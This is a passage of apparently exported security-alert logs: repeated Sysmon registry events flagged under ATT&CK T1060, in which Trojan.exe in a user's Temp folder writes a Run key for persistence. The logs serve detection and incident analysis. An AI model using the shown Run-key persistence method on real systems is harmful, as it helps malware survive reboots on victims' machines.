HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:14.290"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:26.415",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:13.274 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:13.292704400Z"",""eventRecordID"":""1208"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:13.274\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:13.274"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:25.416",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:12.258 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:12.272034400Z"",""eventRecordID"":""1206"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:12.258\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:12.258"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:24.686",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:11.243 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:11.257716600Z"",""eventRecordID"":""1205"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:11.243\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:11.243"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:23.353",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:10.227 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:10.230944300Z"",""eventRecordID"":""1202"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:10.227\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:10.227"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:22.336",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:09.211 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:09.216322900Z"",""eventRecordID"":""1201"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:09.211\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:09.211"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:21.321",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:08.196 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:08.208106400Z"",""eventRecordID"":""1200"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:08.196\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:08.196"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:20.299",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:07.164 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:07.173150100Z"",""eventRecordID"":""1199"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:07.164\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:07.164"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:18.820",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:06.133 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:06.135793600Z"",""eventRecordID"":""1198"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:06.133\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:22:06.133"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:17.437",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:05.118 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:05.130052500Z"",""eventRecordID"":""1196"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:05.118\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:05.118"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:17.399",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:04.086 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:04.148957300Z"",""eventRecordID"":""1195"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:04.086\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:04.086"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:19:16.262",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:03.055 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:03.066912800Z"",""eventRecordID"":""1192"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:03.055\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 